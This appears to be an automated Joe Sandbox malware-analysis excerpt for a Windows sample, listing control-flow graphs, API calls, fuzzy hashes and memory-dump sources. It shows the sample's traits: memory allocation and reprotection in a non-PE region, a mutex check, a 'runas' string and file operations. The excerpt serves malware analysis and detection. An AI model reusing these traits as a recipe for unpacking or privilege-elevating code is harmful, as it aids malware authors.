                    • Instruction ID: eff085a8820556ef2d338989dca7f7ae17fa1bf24247e87c950f3b595bb29a8c
                    • Opcode Fuzzy Hash: 80b1132b2e69c19d12a8b7e2791303c1400add0845b9d63165f9072d547c2120
                    • Instruction Fuzzy Hash: 02F10571D042189BDB24DB68CC49BDEB775AF45314F1042AEE409B72C2DB789EC8CB99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 944 218003c-2180047 945 2180049 944->945 946 218004c-2180263 call 2180a3f call 2180e0f call 2180d90 VirtualAlloc 944->946 945->946 961 218028b-2180292 946->961 962 2180265-2180289 call 2180a69 946->962 964 21802a1-21802b0 961->964 966 21802ce-21803c2 VirtualProtect call 2180cce call 2180ce7 962->966 964->966 967 21802b2-21802cc 964->967 973 21803d1-21803e0 966->973 967->964 974 2180439-21804b8 VirtualFree 973->974 975 21803e2-2180437 call 2180ce7 973->975 977 21804be-21804cd 974->977 978 21805f4-21805fe 974->978 975->973 980 21804d3-21804dd 977->980 981 218077f-2180789 978->981 982 2180604-218060d 978->982 980->978 986 21804e3-2180505 LoadLibraryA 980->986 984 218078b-21807a3 981->984 985 21807a6-21807b0 981->985 982->981 987 2180613-2180637 982->987 984->985 988 218086e-21808be LoadLibraryA 985->988 989 21807b6-21807cb 985->989 990 2180517-2180520 986->990 991 2180507-2180515 986->991 992 218063e-2180648 987->992 997 21808c7-21808f9 988->997 993 21807d2-21807d5 989->993 994 2180526-2180547 990->994 991->994 992->981 995 218064e-218065a 992->995 998 2180824-2180833 993->998 999 21807d7-21807e0 993->999 1000 218054d-2180550 994->1000 995->981 996 2180660-218066a 995->996 1003 218067a-2180689 996->1003 1005 21808fb-2180901 997->1005 1006 2180902-218091d 997->1006 1004 2180839-218083c 998->1004 1007 21807e2 999->1007 1008 21807e4-2180822 999->1008 1001 21805e0-21805ef 1000->1001 1002 2180556-218056b 1000->1002 1001->980 1009 218056d 1002->1009 1010 218056f-218057a 1002->1010 1011 218068f-21806b2 1003->1011 1012 2180750-218077a 1003->1012 1004->988 1013 218083e-2180847 1004->1013 1005->1006 1007->998 1008->993 1009->1001 1014 218059b-21805bb 1010->1014 1015 218057c-2180599 1010->1015 1016 21806ef-21806fc 1011->1016 1017 21806b4-21806ed 1011->1017 1012->992 1018 2180849 1013->1018 1019 218084b-218086c 1013->1019 1027 21805bd-21805db 1014->1027 1015->1027 1021 218074b 1016->1021 1022 21806fe-2180748 1016->1022 1017->1016 1018->988 1019->1004 1021->1003 1022->1021 1027->1000
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0218024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 5783bce6cd5ccce51b09679f3e05ee428f2a6a4bdf07989417e0223f411b94f1
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: B9526A75A01229DFDB64CF58C984BACBBB1BF09304F1580D9E94DAB351DB30AA89CF14

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1178 40dacc-40dad7 1179 40dad9-40dae7 1178->1179 1180 40daed-40db1b call 41d663 1178->1180 1179->1180 1181 40dbcb-40dbd0 call 436c6a 1179->1181 1187 40db4c-40db5e call 41cff1 1180->1187 1188 40db1d-40db2c 1180->1188 1193 40db63-40db69 1187->1193 1189 40db42-40db49 call 41d663 1188->1189 1190 40db2e-40db3c 1188->1190 1189->1187 1190->1181 1190->1189
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 49a191702b5d5566f94e71338abaa26562628b50816476b24f9623ef3bb52aa2
                    • Instruction ID: 38f2449521b5e83f10c936fa6f8dfcbe512f937044bec88a97e9488449440713
                    • Opcode Fuzzy Hash: 49a191702b5d5566f94e71338abaa26562628b50816476b24f9623ef3bb52aa2
                    • Instruction Fuzzy Hash: E941D472E041145BDB28CBB8CC857AEB7B5EF45324F10466EE815F33D1DA749944CB49

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1195 4077b0-407810 call 418680 call 418320 1200 407812-40781e 1195->1200 1201 40783e-4078bd call 417a00 * 2 call 405c10 call 4180c0 call 4072b0 1195->1201 1202 407820-40782e 1200->1202 1203 407834-40783b call 41d663 1200->1203 1226 4078eb-4078f1 1201->1226 1227 4078bf-4078cb 1201->1227 1202->1203 1205 40797a call 436c6a 1202->1205 1203->1201 1211 40797f-407a4a call 436c6a call 417a00 call 405c10 call 418320 call 417a00 call 405c10 call 4180c0 call 4072b0 1205->1211 1256 407a74-407a85 Sleep 1211->1256 1257 407a4c-407a58 1211->1257 1231 4078f3-4078ff 1226->1231 1232 40791b-407933 1226->1232 1229 4078e1-4078e8 call 41d663 1227->1229 1230 4078cd-4078db 1227->1230 1229->1226 1230->1211 1230->1229 1237 407911-407918 call 41d663 1231->1237 1238 407901-40790f 1231->1238 1233 407935-407941 1232->1233 1234 40795d-407979 call 41cff1 1232->1234 1239 407953-40795a call 41d663 1233->1239 1240 407943-407951 1233->1240 1237->1232 1238->1211 1238->1237 1239->1234 1240->1211 1240->1239 1258 407a87-407a93 1256->1258 1259 407aaf-407ac8 call 41cff1 1256->1259 1260 407a6a-407a71 call 41d663 1257->1260 1261 407a5a-407a68 1257->1261 1264 407aa5-407aac call 41d663 1258->1264 1265 407a95-407aa3 1258->1265 1260->1256 1261->1260 1262 407ac9 call 436c6a 1261->1262 1268 407ace-407b1f call 436c6a call 406d70 1262->1268 1264->1259 1265->1264 1265->1268 1277 407b21 1268->1277 1278 407b23-407b30 SetCurrentDirectoryA 1268->1278 1277->1278 1279 407b32-407b3e 1278->1279 1280 407b5e-407c18 call 417a00 call 405c10 call 417a00 call 405c10 call 418320 call 418220 call 417a00 call 405c10 call 4180c0 call 4072b0 1278->1280 1281 407b40-407b4e 1279->1281 1282 407b54-407b5b call 41d663 1279->1282 1312 407c46-407c5e 1280->1312 1313 407c1a-407c26 1280->1313 1281->1282 1284 407d18 call 436c6a 1281->1284 1282->1280 1290 407d1d call 436c6a 1284->1290 1295 407d22-407d27 call 436c6a 1290->1295 1316 407c60-407c6c 1312->1316 1317 407c8c-407ca4 1312->1317 1314 407c28-407c36 1313->1314 1315 407c3c-407c43 call 41d663 1313->1315 1314->1290 1314->1315 1315->1312 1319 407c82-407c89 call 41d663 1316->1319 1320 407c6e-407c7c 1316->1320 1321 407ca6-407cb2 1317->1321 1322 407cce-407cd4 1317->1322 1319->1317 1320->1290 1320->1319 1327 407cc4-407ccb call 41d663 1321->1327 1328 407cb4-407cc2 1321->1328 1323 407cd6-407ce2 1322->1323 1324 407cfe-407d17 call 41cff1 1322->1324 1329 407cf4-407cfb call 41d663 1323->1329 1330 407ce4-407cf2 1323->1330 1327->1322 1328->1290 1328->1327 1329->1324 1330->1295 1330->1329
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: ee738bf8bf9f0de906e0374f4d219b384e7ae33defb4495508657303e1c5108b
                    • Instruction ID: 16d312adbf3c5a63ffdf7f0f3d7c95d875241b4f4b30525d3919e6496bc747c1
                    • Opcode Fuzzy Hash: ee738bf8bf9f0de906e0374f4d219b384e7ae33defb4495508657303e1c5108b
                    • Instruction Fuzzy Hash: D0E13C71E14144ABEB08EB78CD8679D7B72DF42304F60815EF405A73C6DB7D9A80879A

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1346 40c3a6-40c3aa 1347 40c3b0-40c438 call 417a00 call 405c10 call 4180c0 1346->1347 1348 40c839-40c881 1346->1348 1367 40c43a 1347->1367 1368 40c43c-40c45a call 419470 1347->1368 1352 40c883-40c88f 1348->1352 1353 40c8ab-40c8c6 call 41cff1 1348->1353 1355 40c8a1-40c8a8 call 41d663 1352->1355 1356 40c891-40c89f 1352->1356 1355->1353 1356->1355 1359 40c8d6-40c8db call 436c6a 1356->1359 1367->1368 1371 40c460-40c4cb call 417a00 call 405c10 call 4180c0 1368->1371 1372 40c4f8 1368->1372 1401 40c4cd 1371->1401 1402 40c4cf-40c4f0 call 419470 1371->1402 1373 40c4fb 1372->1373 1375 40c4ff-40c502 1373->1375 1377 40c504-40c50d 1375->1377 1378 40c53a-40c544 1375->1378 1377->1378 1383 40c50f-40c51a 1377->1383 1381 40c546-40c54f 1378->1381 1382 40c58f-40c599 1378->1382 1385 40c551-40c55d 1381->1385 1386 40c57d-40c58b 1381->1386 1387 40c5d1-40c5db 1382->1387 1388 40c59b-40c5a4 1382->1388 1389 40c530-40c537 call 41d663 1383->1389 1390 40c51c-40c52a 1383->1390 1394 40c573-40c57a call 41d663 1385->1394 1395 40c55f-40c56d 1385->1395 1386->1382 1391 40c614-40c618 1387->1391 1392 40c5dd-40c5e3 1387->1392 1388->1387 1396 40c5a6-40c5b1 1388->1396 1389->1378 1390->1389 1397 40c8c7 call 436c6a 1390->1397 1405 40c71b-40c72d call 4180c0 1391->1405 1406 40c61e-40c645 call 417a00 call 405c10 1391->1406 1392->1391 1400 40c5e5-40c5f4 1392->1400 1394->1386 1395->1394 1395->1397 1407 40c5b3-40c5c1 1396->1407 1408 40c5c7-40c5ce call 41d663 1396->1408 1413 40c8cc call 436c6a 1397->1413 1410 40c5f6-40c604 1400->1410 1411 40c60a-40c611 call 41d663 1400->1411 1401->1402 1402->1373 1425 40c4f2-40c4f6 1402->1425 1417 40c732-40c74d call 436729 1405->1417 1433 40c647 1406->1433 1434 40c649-40c65a 1406->1434 1407->1397 1407->1408 1408->1387 1410->1397 1410->1411 1411->1391 1426 40c8d1 1413->1426 1431 40c75d-40c765 1417->1431 1432 40c74f-40c758 call 4367b7 1417->1432 1425->1375 1426->1359 1429 40c8d1 call 436c6a 1426->1429 1429->1359 1436 40c770-40c78b call 436729 1431->1436 1445 40c805-40c80b 1432->1445 1433->1434 1437 40c65c-40c67c call 434250 1434->1437 1438 40c67e-40c689 call 418f40 1434->1438 1450 40c79d-40c7c9 call 417a00 * 2 call 40bb90 1436->1450 1451 40c78d-40c79b call 4367b7 1436->1451 1444 40c68e-40c698 1437->1444 1438->1444 1448 40c6c9-40c6e5 1444->1448 1449 40c69a-40c6a9 1444->1449 1445->1348 1447 40c80d-40c819 1445->1447 1452 40c81b-40c829 1447->1452 1453 40c82f-40c836 call 41d663 1447->1453 1457 40c6e7-40c707 call 434250 1448->1457 1458 40c709-40c719 call 418f40 1448->1458 1455 40c6ab-40c6b9 1449->1455 1456 40c6bf-40c6c6 call 41d663 1449->1456 1467 40c7cc-40c7e7 call 436729 1450->1467 1451->1467 1452->1426 1452->1453 1453->1348 1455->1413 1455->1456 1456->1448 1457->1417 1458->1417 1477 40c7f4-40c7f9 Sleep 1467->1477 1478 40c7e9-40c7f2 call 4367b7 1467->1478 1480 40c7fb-40c7ff 1477->1480 1478->1480 1480->1436 1480->1445
                    APIs
                      • Part of subcall function 00417A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00417AF8
                      • Part of subcall function 00417A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00417B01
                    • Sleep.KERNEL32(000003E8), ref: 0040C7F9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
                    • String ID:
                    • API String ID: 113500496-0
                    • Opcode ID: 0a7cb503edac44424bd4f6975314c444da3cd61ca8811e0566eebd0e793d9507
                    • Instruction ID: 5a5a39bdf66b3153d44a1018dc39ac7d8d4adb77eca0788226074bda14c0a91d
                    • Opcode Fuzzy Hash: 0a7cb503edac44424bd4f6975314c444da3cd61ca8811e0566eebd0e793d9507
                    • Instruction Fuzzy Hash: 4512A071A00108DBDB04DF68CDC5BDEBBB5EF49304F54822EE805A72D2D7399A85CB99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1495 416d30-416d45 call 40a960 call 40ce40 call 40d6d0 1501 416d4a-416d54 CreateThread call 414fc0 call 406020 1495->1501 1507 416d20-416d27 Sleep 1501->1507 1507->1507
                    APIs
                      • Part of subcall function 00409A00: Sleep.KERNELBASE(00000064), ref: 0040A963
                      • Part of subcall function 00409A00: CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981
                      • Part of subcall function 00409A00: GetLastError.KERNEL32 ref: 0040A989
                      • Part of subcall function 00409A00: GetLastError.KERNEL32 ref: 0040A99A
                      • Part of subcall function 00405C10: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040617D
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 00416D10
                    • Sleep.KERNEL32(00007530), ref: 00416D25
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastSleep$MutexOpenThread
                    • String ID:
                    • API String ID: 2377761554-0
                    • Opcode ID: 6382081bcbf8a9ed3d33521cf0e432a915f352317681496325614467e45a9fec
                    • Instruction ID: 0e677149ad7de975180ec068863c876e2b41020de11884c8df8d41ceb524a5b2
                    • Opcode Fuzzy Hash: 6382081bcbf8a9ed3d33521cf0e432a915f352317681496325614467e45a9fec
                    • Instruction Fuzzy Hash: 1FE08C75784304A6E21033F27C0BF997A109F09F15F26013AB25A3A1D2D9ECB08086EF

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1508 2180e0f-2180e24 SetErrorMode * 2 1509 2180e2b-2180e2c 1508->1509 1510 2180e26 1508->1510 1510->1509
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,02180223,?,?), ref: 02180E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,02180223,?,?), ref: 02180E1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: a846ea09069fb0ff73c478be89de1126635b9151421e274922989b7d7294ded1
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: 94D0123214512C77D7003A94DC09BCE7B1CDF09B66F108011FB0DD9080C770954046E5

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1511 40d159-40d18a GetModuleFileNameA 1512 40d191-40d196 1511->1512 1512->1512 1513 40d198-40d1f2 call 4180c0 call 417a00 call 405c10 call 40ca70 1512->1513 1522 40d1f4-40d1ff 1513->1522 1523 40d20b-40d226 call 418f40 1513->1523 1524 40d201 1522->1524 1525 40d203-40d209 1522->1525 1527 40d228-40d29b call 418220 1523->1527 1524->1525 1525->1527 1531 40d29d 1527->1531 1532 40d29f-40d2c0 call 419470 1527->1532 1531->1532 1535 40d2f1-40d319 1532->1535 1536 40d2c2-40d2d1 1532->1536 1539 40d34a-40d372 1535->1539 1540 40d31b-40d32a 1535->1540 1537 40d2d3-40d2e1 1536->1537 1538 40d2e7-40d2ee call 41d663 1536->1538 1537->1538 1541 40d57c call 436c6a 1537->1541 1538->1535 1545 40d3a3-40d3cb 1539->1545 1546 40d374-40d383 1539->1546 1543 40d340-40d347 call 41d663 1540->1543 1544 40d32c-40d33a 1540->1544 1558 40d581-40d648 call 436c6a call 409230 call 417a00 call 405c10 call 418220 call 417a00 call 405c10 call 417a00 call 405c10 call 405ee0 1541->1558 1543->1539 1544->1541 1544->1543 1547 40d3fc-40d41e 1545->1547 1548 40d3cd-40d3dc 1545->1548 1552 40d385-40d393 1546->1552 1553 40d399-40d3a0 call 41d663 1546->1553 1556 40d420-40d42b 1547->1556 1557 40d44b-40d452 1547->1557 1554 40d3f2-40d3f9 call 41d663 1548->1554 1555 40d3de-40d3ec 1548->1555 1552->1541 1552->1553 1553->1545 1554->1547 1555->1541 1555->1554 1563 40d441-40d448 call 41d663 1556->1563 1564 40d42d-40d43b 1556->1564 1566 40d4e8-40d4f1 1557->1566 1567 40d458-40d4e0 call 4180c0 * 2 call 417a00 * 2 call 40b1a0 1557->1567 1615 40d672-40d68a 1558->1615 1616 40d64a-40d656 1558->1616 1563->1557 1564->1541 1564->1563 1568 40d4f3-40d502 1566->1568 1569 40d51e-40d527 1566->1569 1604 40d4e5 1567->1604 1575 40d514-40d51b call 41d663 1568->1575 1576 40d504-40d512 1568->1576 1577 40d554-40d571 call 41cff1 1569->1577 1578 40d529-40d538 1569->1578 1575->1569 1576->1558 1576->1575 1584 40d54a-40d551 call 41d663 1578->1584 1585 40d53a-40d548 1578->1585 1584->1577 1585->1558 1585->1584 1604->1566 1619 40d6b4-40d6c3 1615->1619 1620 40d68c-40d698 1615->1620 1617 40d668-40d66f call 41d663 1616->1617 1618 40d658-40d666 1616->1618 1617->1615 1618->1617 1621 40d6c4-40d6c9 call 436c6a 1618->1621 1623 40d6aa-40d6b1 call 41d663 1620->1623 1624 40d69a-40d6a8 1620->1624 1623->1619 1624->1621 1624->1623
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D167
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileModuleName
                    • String ID:
                    • API String ID: 514040917-0
                    • Opcode ID: 9df6dc6c6b6516bd832a521bdb968700339736e89c6f6026bf061d540936f4fe
                    • Instruction ID: 136bb09125c68fe2e081d2bed29a15b875233fc51c93fcab2b4112f563e43fa9
                    • Opcode Fuzzy Hash: 9df6dc6c6b6516bd832a521bdb968700339736e89c6f6026bf061d540936f4fe
                    • Instruction Fuzzy Hash: 30E11971E002549BEB19DB68CD497DDBB71AF46308F1042DED4086B3C2DB799BC88B99

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1630 40d6d0-40d93d call 40ca70 call 417a00 call 405c10 call 418680 call 418220 GetModuleFileNameA 1645 40d940-40d945 1630->1645 1645->1645 1646 40d947-40db1b call 4180c0 call 419470 1645->1646 1654 40db4c-40db69 call 41cff1 1646->1654 1655 40db1d-40db2c 1646->1655 1656 40db42-40db49 call 41d663 1655->1656 1657 40db2e-40db3c 1655->1657 1656->1654 1657->1656 1659 40dbcb-40dbd0 call 436c6a 1657->1659
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c18bc24b5b40a2134f91a76ed29d8d8ee532285b02a30a0b6b595c82aba4457
                    • Instruction ID: 6ba3f6d73affff0805543805238ddc276f563b6c65a7d1c94091dbc822e03449
                    • Opcode Fuzzy Hash: 8c18bc24b5b40a2134f91a76ed29d8d8ee532285b02a30a0b6b595c82aba4457
                    • Instruction Fuzzy Hash: 2051FD70D042589BEB24DB68CD88BDEBBB1AB46304F5041EAD408672C2DB795FC8CF85

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1665 40c8e0-40c91d 1666 40c937-40c945 1665->1666 1667 40c91f-40c935 1665->1667 1668 40c94c-40c959 1666->1668 1669 40c947 call 418de0 1666->1669 1667->1668 1670 40c973-40c981 1668->1670 1671 40c95b-40c971 1668->1671 1669->1668 1672 40c988-40c9dc SHFileOperation 1670->1672 1673 40c983 call 418de0 1670->1673 1671->1672 1674 40ca06-40ca1e 1672->1674 1675 40c9de-40c9ea 1672->1675 1673->1672 1676 40ca20-40ca2c 1674->1676 1677 40ca48-40ca63 call 41cff1 1674->1677 1678 40c9fc-40ca03 call 41d663 1675->1678 1679 40c9ec-40c9fa 1675->1679 1682 40ca3e-40ca45 call 41d663 1676->1682 1683 40ca2e-40ca3c 1676->1683 1678->1674 1679->1678 1680 40ca64-40ca69 call 436c6a 1679->1680 1682->1677 1683->1680 1683->1682
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c4513db9c8ca4ea5d03b4e6baea22fc72861bf157a0bb9fd0c640f3efb5b9add
                    • Instruction ID: 6f1343131b8dd863bc46bdb2e422fc6909b0f8608393747acf9dbc8e3f269829
                    • Opcode Fuzzy Hash: c4513db9c8ca4ea5d03b4e6baea22fc72861bf157a0bb9fd0c640f3efb5b9add
                    • Instruction Fuzzy Hash: 38315C7161024CAFEB04DFA8C985BDEBBB5FB49704F50422AF805A72C1D7799980CB98
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: __wsopen_s
                    • String ID:
                    • API String ID: 3347428461-0
                    • Opcode ID: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                    • Instruction ID: a66abbd6648e96b8c426010f02d88ffd1877682ffd29169a79776235427ef3c3
                    • Opcode Fuzzy Hash: b179973e2016f215b0ef3759c58dae6fc3af94d4a8fe8fa67ffe374620a294ef
                    • Instruction Fuzzy Hash: 551118B1A0420AAFCB05DF59E94199B7BF4EF48304F04406AF805AB351D670DD21DB69
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
                    • Instruction ID: c9b0d8fa498f0fd219daed50f945327353b6da4e75b16bd436644be4f456858a
                    • Opcode Fuzzy Hash: 0da8171cac030f6b45925a7c5248a00485fab8e2398974f4a4f83c3fb58f0ae8
                    • Instruction Fuzzy Hash: DE014F72C01159BFDF01EFE88C01AEE7FB5AF08314F14416AF914F2161E6358A65DB95
                    APIs
                    • CreateFileW.KERNELBASE(00000000,00000000,?,00441B65,?,?,00000000,?,00441B65,00000000,0000000C), ref: 00441792
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction ID: 728716dea2d8701cc34847fc6eeab83fc4e7ccc419190b368175d6442f09313a
                    • Opcode Fuzzy Hash: efd75a4b3e0d0f44703b7e6113a489f3725145c46bff7276ab7cb2ca30d4afc5
                    • Instruction Fuzzy Hash: 10D06C3201020DBBDF028F84DC06EDE3BAAFB48715F014150BA1856020C732E861AB94
                    APIs
                    • GetFileAttributesA.KERNELBASE(?), ref: 004087B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
                    • Instruction ID: cf245ddd44955969ee6657244a22e3e52baad1822ae61319476e7950b8878db5
                    • Opcode Fuzzy Hash: 1c359e556df86ff6f81b295afed9701b7315f92a1b1b96a2d875eaf16d26da57
                    • Instruction Fuzzy Hash: CEC0803801060006DD1C06385F49555330655537B53F40BBDE4F16B2F5CB3D5807D608
                    APIs
                    • GetFileAttributesA.KERNELBASE(?), ref: 004087B9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
                    • Instruction ID: eec6361e8626f86b60cf0449171d9436f9a85d39230ea77d0a5306f3f4484108
                    • Opcode Fuzzy Hash: 91263034b88fd9d872aba8cf726a75655e3cadde92fadada609a05562aff1eac
                    • Instruction Fuzzy Hash: 83C0803801020047DA1C4B386F49515331699537353F00B7DE4B16B2F5CB3EC403C758
                    APIs
